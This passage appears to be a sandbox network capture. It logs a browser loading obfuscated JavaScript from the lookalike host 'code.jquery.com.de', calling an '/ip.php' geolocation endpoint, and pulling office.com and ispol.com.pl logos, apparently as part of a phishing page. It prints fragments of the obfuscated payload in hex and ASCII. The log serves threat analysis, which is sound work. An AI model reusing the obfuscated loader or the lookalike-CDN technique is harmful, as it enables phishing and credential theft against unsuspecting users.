#2098D1; color: white;}/* Back Pulse */@-webkit-keyframes hvr-back-pulse { 50% { background-color: rgba(32, 152, 209, 0.75); }}@keyframes hvr-back-pulse {
2024-06-20 16:14:11 UTC	1301	IN	Data Raw: 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 65 61 73 65 2d 6f 75 74 3b 0a 7d 0a 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 68 6f 76 65 72 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 66 6f 63 75 73 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 61 63 74 69 76 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 68 6f 76 65 72 3a 62 65 66 6f 72 65 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 66 6f 63 75 73 3a 62 65 66 6f 72 65 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a Data Ascii: g-function: ease-out;}.hvr-shutter-in-horizontal:hover, .hvr-shutter-in-horizontal:focus, .hvr-shutter-in-horizontal:active { color: white;}.hvr-shutter-in-horizontal:hover:before, .hvr-shutter-in-horizontal:focus:before, .hvr-shutter-in-horizontal:
2024-06-20 16:14:11 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 68 76 72 2d 73 68 75 74 74 65 72 2d 6f 75 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 66 6f 63 75 73 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 6f 75 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 61 63 74 69 76 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 6f 75 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 68 6f 76 65 72 3a 62 65 66 6f 72 65 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 6f 75 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 66 6f 63 75 73 3a 62 65 66 6f 72 65 2c 20 2e 68 76 72 2d 73 68 75 74 74 65 72 2d 6f 75 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 61 63 74 69 76 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 58 28 Data Ascii: 00004000hvr-shutter-out-horizontal:focus, .hvr-shutter-out-horizontal:active { color: white;}.hvr-shutter-out-horizontal:hover:before, .hvr-shutter-out-horizontal:focus:before, .hvr-shutter-out-horizontal:active:before { -webkit-transform: scaleX(
2024-06-20 16:14:11 UTC	12	IN	Data Raw: 20 20 62 6f 78 2d 73 68 61 64 0d 0a Data Ascii: box-shad
2024-06-20 16:14:11 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 6f 77 3a 20 30 20 30 20 38 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 36 29 3b 0a 7d 0a 0a 2f 2a 20 53 68 61 64 6f 77 20 2a 2f 0a 2e 68 76 72 2d 73 68 61 64 6f 77 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 70 65 72 73 70 65 63 74 69 76 65 28 31 70 78 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 70 65 72 73 70 65 63 74 69 76 65 28 31 70 78 29 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 Data Ascii: 00004000ow: 0 0 8px rgba(0, 0, 0, 0.6);}/* Shadow */.hvr-shadow { display: inline-block; vertical-align: middle; -webkit-transform: perspective(1px) translateZ(0); transform: perspective(1px) translateZ(0); box-shadow: 0 0 1px rgba(0, 0, 0
2024-06-20 16:14:11 UTC	12	IN	Data Raw: 65 62 6b 69 74 2d 74 72 61 6e 0d 0a Data Ascii: ebkit-tran
2024-06-20 16:14:11 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 5a 28 30 29 3b 0a 7d 0a 2e 68 76 72 2d 69 63 6f 6e 2d 75 70 3a 68 6f 76 65 72 20 2e 68 76 72 2d 69 63 6f 6e 2c 20 2e 68 76 72 2d 69 63 6f 6e 2d 75 70 3a 66 6f 63 75 73 20 2e 68 76 72 2d 69 63 6f 6e 2c 20 2e 68 76 72 2d 69 63 6f 6e 2d 75 70 3a 61 63 74 69 76 65 20 2e 68 76 72 2d 69 63 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 68 76 72 2d 69 63 6f 6e 2d 75 70 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 68 76 72 2d 69 63 6f 6e 2d 75 70 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 30 Data Ascii: 00004000sform: translateZ(0); transform: translateZ(0);}.hvr-icon-up:hover .hvr-icon, .hvr-icon-up:focus .hvr-icon, .hvr-icon-up:active .hvr-icon { -webkit-animation-name: hvr-icon-up; animation-name: hvr-icon-up; -webkit-animation-duration: 0
2024-06-20 16:14:11 UTC	12	IN	Data Raw: 69 6f 6e 3a 20 30 2e 33 73 3b 0d 0a Data Ascii: ion: 0.3s;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49713	38.34.185.163	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:11 UTC	501	OUT	GET /jquery-3.5.1.min.js HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:11 UTC	221	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:11 GMT Server: Apache Last-Modified: Sun, 10 Jul 2022 16:27:33 GMT Accept-Ranges: bytes Content-Length: 403295 Connection: close Content-Type: application/javascript
2024-06-20 16:14:11 UTC	7971	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 37 31 64 28 5f 30 78 31 34 35 32 36 61 2c 5f 30 78 33 62 62 64 38 38 29 7b 76 61 72 20 5f 30 78 31 36 30 34 64 38 3d 5f 30 78 33 66 61 38 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 37 31 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 65 37 64 66 2c 5f 30 78 31 62 64 64 64 36 29 7b 5f 30 78 32 62 65 37 64 66 3d 5f 30 78 32 62 65 37 64 66 2d 28 2d 30 78 32 65 2a 30 78 31 66 2b 30 78 36 2a 30 78 34 30 62 2b 2d 30 78 31 31 38 31 2a 30 78 31 29 3b 76 61 72 20 5f 30 78 32 61 62 65 62 39 3d 5f 30 78 31 36 30 34 64 38 5b 5f 30 78 32 62 65 37 64 66 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 61 62 65 62 39 3b 7d 2c 5f 30 78 31 37 31 64 28 5f 30 78 31 34 35 32 36 61 2c 5f 30 78 33 62 62 64 38 38 29 3b 7d 76 61 72 20 5f 30 78 33 39 Data Ascii: function _0x171d(_0x14526a,_0x3bbd88){var _0x1604d8=_0x3fa8();return _0x171d=function(_0x2be7df,_0x1bddd6){_0x2be7df=_0x2be7df-(-0x2e0x1f+0x60x40b+-0x1181*0x1);var _0x2abeb9=_0x1604d8[_0x2be7df];return _0x2abeb9;},_0x171d(_0x14526a,_0x3bbd88);}var _0x39
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 2c 27 62 65 72 62 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 39 61 36 38 2c 5f 30 78 33 66 31 30 61 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 61 39 61 36 38 2b 5f 30 78 33 66 31 30 61 62 3b 7d 2c 27 42 79 46 4a 57 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 33 65 34 38 2c 5f 30 78 31 66 65 33 66 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 34 33 65 34 38 3d 3d 3d 5f 30 78 31 66 65 33 66 38 3b 7d 2c 27 6f 74 69 6c 44 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 32 62 31 63 2c 5f 30 78 34 38 33 37 36 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 32 62 31 63 3d 3d 3d 5f 30 78 34 38 33 37 36 38 3b 7d 2c 27 4a 68 4d 4f 6d 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 34 65 29 2c 27 41 50 55 52 61 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 64 39 Data Ascii: ,'berbj':function(_0x3a9a68,_0x3f10ab){return _0x3a9a68+_0x3f10ab;},'ByFJW':function(_0x443e48,_0x1fe3f8){return _0x443e48===_0x1fe3f8;},'otilD':function(_0x122b1c,_0x483768){return _0x122b1c===_0x483768;},'JhMOm':_0x221323(0x14e),'APURa':function(_0x2dd9
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 27 6f 68 6a 57 70 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 66 30 35 61 2c 5f 30 78 32 65 32 38 35 36 2c 5f 30 78 35 36 33 33 36 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 63 66 30 35 61 28 5f 30 78 32 65 32 38 35 36 2c 5f 30 78 35 36 33 33 36 30 29 3b 7d 2c 27 79 49 69 77 4e 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 65 65 29 2c 27 74 42 7a 45 56 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 36 35 33 29 2c 27 62 43 69 4a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 64 38 31 66 62 33 2c 5f 30 78 31 38 66 62 33 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 64 38 31 66 62 33 3c 3d 5f 30 78 31 38 66 62 33 38 3b 7d 2c 27 6d 75 56 6e 6f 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 33 34 66 29 2c 27 48 6f 67 73 45 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 37 61 Data Ascii: 'ohjWp':function(_0x3cf05a,_0x2e2856,_0x563360){return _0x3cf05a(_0x2e2856,_0x563360);},'yIiwN':_0x221323(0x2ee),'tBzEV':_0x221323(0x653),'bCiJb':function(_0xd81fb3,_0x18fb38){return _0xd81fb3<=_0x18fb38;},'muVno':_0x221323(0x34f),'HogsE':function(_0x297a
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 37 33 66 63 2c 5f 30 78 35 62 62 34 65 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 62 37 33 66 63 3c 5f 30 78 35 62 62 34 65 31 3b 7d 2c 27 72 52 46 74 71 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 33 37 30 29 2c 27 59 4a 64 4e 79 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 66 61 36 31 38 2c 5f 30 78 34 30 39 38 36 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 39 66 61 36 31 38 7c 7c 5f 30 78 34 30 39 38 36 66 3b 7d 2c 27 47 4f 72 7a 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 34 36 34 62 66 2c 5f 30 78 34 38 35 35 66 33 2c 5f 30 78 32 63 61 30 61 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 34 36 34 62 66 28 5f 30 78 34 38 35 35 66 33 2c 5f 30 78 32 63 61 30 61 30 29 3b 7d 2c 27 55 7a 70 72 54 27 3a 5f 30 78 32 32 31 33 32 Data Ascii: unction(_0x2b73fc,_0x5bb4e1){return _0x2b73fc<_0x5bb4e1;},'rRFtq':_0x221323(0x370),'YJdNy':function(_0x9fa618,_0x40986f){return _0x9fa618\|\|_0x40986f;},'GOrzN':function(_0x3464bf,_0x4855f3,_0x2ca0a0){return _0x3464bf(_0x4855f3,_0x2ca0a0);},'UzprT':_0x22132
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 31 66 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 37 30 34 61 61 3d 3d 3d 5f 30 78 33 63 33 31 66 61 3b 7d 2c 27 4b 55 5a 43 43 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 61 63 36 36 33 35 2c 5f 30 78 32 33 39 62 62 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 63 36 36 33 35 3d 3d 3d 5f 30 78 32 33 39 62 62 33 3b 7d 2c 27 63 63 65 6c 44 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 38 62 30 29 2c 27 79 4f 78 41 63 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 33 61 30 66 37 2c 5f 30 78 35 62 61 65 32 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 33 61 30 66 37 3d 3d 3d 5f 30 78 35 62 61 65 32 35 3b 7d 2c 27 51 58 75 6c 56 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 36 32 29 2c 27 58 79 58 6c 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 32 34 38 30 35 2c 5f 30 78 34 Data Ascii: 1fa){return _0x5704aa===_0x3c31fa;},'KUZCC':function(_0xac6635,_0x239bb3){return _0xac6635===_0x239bb3;},'ccelD':_0x221323(0x8b0),'yOxAc':function(_0x53a0f7,_0x5bae25){return _0x53a0f7===_0x5bae25;},'QXulV':_0x221323(0x262),'XyXlR':function(_0x524805,_0x4
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 35 63 66 2c 5f 30 78 31 66 66 65 31 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 65 34 35 63 66 28 5f 30 78 31 66 66 65 31 33 29 3b 7d 2c 27 70 68 56 74 4c 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 32 31 38 29 2c 27 64 4d 76 67 4a 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 35 61 29 2c 27 61 67 4c 4c 4a 27 3a 5f 30 78 32 32 31 33 32 33 28 30 78 31 66 65 29 2c 27 66 58 78 71 61 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 36 37 64 30 62 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 36 37 64 30 62 28 29 3b 7d 2c 27 54 70 61 57 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 36 31 39 31 33 2c 5f 30 78 34 34 62 65 66 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 36 31 39 31 33 28 5f 30 78 34 34 62 65 66 30 29 3b 7d 2c 27 6e 6d 53 61 49 27 3a 66 75 6e 63 74 69 6f 6e 28 5f Data Ascii: 5cf,_0x1ffe13){return _0x1e45cf(_0x1ffe13);},'phVtL':_0x221323(0x218),'dMvgJ':_0x221323(0x15a),'agLLJ':_0x221323(0x1fe),'fXxqa':function(_0x167d0b){return _0x167d0b();},'TpaWk':function(_0x261913,_0x44bef0){return _0x261913(_0x44bef0);},'nmSaI':function(_
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 31 66 63 29 5d 28 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 31 63 63 29 5d 2c 5f 30 78 33 66 32 66 32 61 29 26 26 5f 30 78 33 66 32 66 32 61 5b 5f 30 78 31 65 32 61 35 33 28 30 78 34 37 30 29 5d 2c 5f 30 78 63 66 30 34 31 31 3d 5f 30 78 35 34 34 34 65 33 28 5f 30 78 33 66 32 66 32 61 29 3b 72 65 74 75 72 6e 21 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 37 32 66 29 5d 28 5f 30 78 34 38 39 34 38 34 2c 5f 30 78 33 66 32 66 32 61 29 26 26 21 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 37 32 66 29 5d 28 5f 30 78 34 37 30 65 62 61 2c 5f 30 78 33 66 32 66 32 61 29 26 26 28 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 65 32 61 35 33 28 30 78 38 62 36 29 Data Ascii: bc[_0x1e2a53(0x1fc)](_0x7a4abc[_0x1e2a53(0x1cc)],_0x3f2f2a)&&_0x3f2f2a[_0x1e2a53(0x470)],_0xcf0411=_0x5444e3(_0x3f2f2a);return!_0x7a4abc[_0x1e2a53(0x72f)](_0x489484,_0x3f2f2a)&&!_0x7a4abc[_0x1e2a53(0x72f)](_0x470eba,_0x3f2f2a)&&(_0x7a4abc[_0x1e2a53(0x8b6)
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 28 6e 75 6c 6c 2c 5f 30 78 32 37 32 30 38 64 3d 5f 30 78 35 34 61 62 64 35 28 5f 30 78 34 65 35 35 31 32 5b 5f 30 78 34 66 37 35 61 65 5d 2c 5f 30 78 34 66 37 35 61 65 2c 5f 30 78 31 65 65 39 66 30 29 29 26 26 5f 30 78 32 61 62 30 32 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 34 64 63 29 5d 28 5f 30 78 32 37 32 30 38 64 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 5f 30 78 34 66 37 35 61 65 20 69 6e 20 5f 30 78 34 65 35 35 31 32 29 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 32 38 38 29 5d 28 6e 75 6c 6c 2c 5f 30 78 32 37 32 30 38 64 3d 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 39 35 30 65 66 62 28 30 78 36 30 62 29 5d 28 5f 30 78 35 34 61 62 64 35 2c 5f 30 78 34 65 35 35 31 32 5b 5f 30 78 34 66 37 35 61 65 5d 2c 5f 30 78 34 66 37 35 61 65 2c 5f Data Ascii: (null,_0x27208d=_0x54abd5(_0x4e5512[_0x4f75ae],_0x4f75ae,_0x1ee9f0))&&_0x2ab02c[_0x950efb(0x4dc)](_0x27208d);}else{for(_0x4f75ae in _0x4e5512)_0x7a4abc[_0x950efb(0x288)](null,_0x27208d=_0x7a4abc[_0x950efb(0x60b)](_0x54abd5,_0x4e5512[_0x4f75ae],_0x4f75ae,_
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 37 65 29 7b 76 61 72 20 5f 30 78 31 34 61 64 32 64 3d 5f 30 78 33 34 37 38 37 63 3b 72 65 74 75 72 6e 20 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 31 34 61 64 32 64 28 30 78 34 61 31 29 5d 28 5f 30 78 31 61 65 37 30 39 2c 5f 30 78 35 34 33 37 37 65 29 3b 7d 2c 27 63 51 53 6e 6d 27 3a 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 34 37 38 37 63 28 30 78 31 34 61 29 5d 2c 27 45 6b 56 64 41 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 62 37 30 35 32 2c 5f 30 78 35 38 66 30 66 38 29 7b 76 61 72 20 5f 30 78 33 38 30 66 61 30 3d 5f 30 78 33 34 37 38 37 63 3b 72 65 74 75 72 6e 20 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 38 30 66 61 30 28 30 78 36 62 35 29 5d 28 5f 30 78 39 62 37 30 35 32 2c 5f 30 78 35 38 66 30 66 38 29 3b 7d 2c 27 6b 6c 77 56 51 27 3a 66 75 6e 63 74 Data Ascii: 7e){var _0x14ad2d=_0x34787c;return _0x7a4abc[_0x14ad2d(0x4a1)](_0x1ae709,_0x54377e);},'cQSnm':_0x7a4abc[_0x34787c(0x14a)],'EkVdA':function(_0x9b7052,_0x58f0f8){var _0x380fa0=_0x34787c;return _0x7a4abc[_0x380fa0(0x6b5)](_0x9b7052,_0x58f0f8);},'klwVQ':funct
2024-06-20 16:14:12 UTC	8000	IN	Data Raw: 30 38 32 2c 5f 30 78 35 62 63 61 35 63 2c 5f 30 78 35 64 35 62 30 30 3d 5f 30 78 33 34 37 38 37 63 28 30 78 31 38 36 29 2b 28 30 78 31 30 63 2a 30 78 31 2b 30 78 31 63 2a 2d 30 78 61 36 2b 30 78 31 2a 30 78 31 31 31 64 29 2a 6e 65 77 20 44 61 74 65 28 29 2c 5f 30 78 35 65 33 64 37 65 3d 5f 30 78 33 37 62 34 63 30 5b 5f 30 78 33 34 37 38 37 63 28 30 78 36 39 38 29 5d 2c 5f 30 78 36 32 36 66 38 39 3d 30 78 32 34 36 62 2a 2d 30 78 31 2b 30 78 36 31 64 2b 30 78 31 65 34 65 2c 5f 30 78 35 35 30 66 35 66 3d 30 78 34 2a 2d 30 78 36 64 39 2b 2d 30 78 31 32 32 2b 30 78 39 38 32 2a 30 78 33 2c 5f 30 78 33 64 34 34 64 35 3d 5f 30 78 37 61 34 61 62 63 5b 5f 30 78 33 34 37 38 37 63 28 30 78 35 33 61 29 5d 28 5f 30 78 35 63 36 38 31 32 29 2c 5f 30 78 33 35 62 63 38 36 Data Ascii: 082,_0x5bca5c,_0x5d5b00=_0x34787c(0x186)+(0x10c0x1+0x1c-0xa6+0x10x111d)new Date(),_0x5e3d7e=_0x37b4c0[_0x34787c(0x698)],_0x626f89=0x246b-0x1+0x61d+0x1e4e,_0x550f5f=0x4-0x6d9+-0x122+0x982*0x3,_0x3d44d5=_0x7a4abc[_0x34787c(0x53a)](_0x5c6812),_0x35bc86

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49717	18.239.36.50	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:13 UTC	503	OUT	GET /ispol.com.pl HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:14 UTC	491	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close Date: Thu, 20 Jun 2024 16:14:13 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Error from cloudfront Via: 1.1 e71625290a8b18b90edbfcbc81303596.cloudfront.net (CloudFront) X-Amz-Cf-Pop: AMS58-P2 X-Amz-Cf-Id: g2qoh9ANNLRVz4GExClciebBfKYkY-ocnBAl3K5BjQnKHcL7z68LVw==
2024-06-20 16:14:14 UTC	1	IN	Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49716	38.34.185.163	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:13 UTC	498	OUT	GET /ip.php HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:14 UTC	257	IN	HTTP/1.1 200 OK Date: Thu, 20 Jun 2024 16:14:14 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2024-06-20 16:14:14 UTC	42	IN	Data Raw: 32 34 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 20 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d 0d 0a Data Ascii: 24{"ip":"8.46.123.33 : United States"}
2024-06-20 16:14:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49721	18.239.36.50	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-20 16:14:14 UTC	551	OUT	GET /office.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-20 16:14:15 UTC	553	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 756 Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Sun, 16 Jun 2024 12:58:01 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Hit from cloudfront Via: 1.1 95e331271d583b113f2793246bc6205c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: AMS58-P2 X-Amz-Cf-Id: pdOpbV9BrRJSJ4yeNUtLesplDMF7pH2wntvBaxuxqQRGcmzsLcj4Iw== Age: 357374
2024-06-20 16:14:15 UTC	756	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 02 bb 49 44 41 54 78 9c ec dd 4d 6a 14 4d 1c 80 f1 aa ea 9e c9 07 bc 09 2f 89 18 88 d1 8d e8 42 14 5c 28 c4 13 78 81 e4 16 2e 3d 85 6b af e0 22 71 eb 09 14 5c 06 11 c4 80 3b 03 7e 90 85 42 8c 1a a7 aa 24 07 70 40 28 ea 59 f8 fc 0e f0 af 64 1e aa 7b 06 a6 7a c6 5a 6b 10 27 d1 7f c0 bf ce 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 33 00 cc 00 30 03 c0 0c 00 1b 1b ce aa c7 1f f2 e1 41 c3 81 f3 cd ae df 5e 5c df a8 e7 0b c7 37 9f f7 bb ad bb b5 ba bd b2 78 a9 d5 b4 96 01 f2 e1 c1 f7 47 0f 1a 0e 9c 23 86 72 f2 f0 f1 c6 da fd 1c 6b aa c3 de eb dd d8 eb 1b 7e 3b b7 f6 6e 2c ee Data Ascii: PNGIHDRL\IDATxMjM/B\(x.=k"q\;~B$p@(Yd{zZk'03030303030A^\7xG#rk~;n,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49723	38.34.185.163	443	3464	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
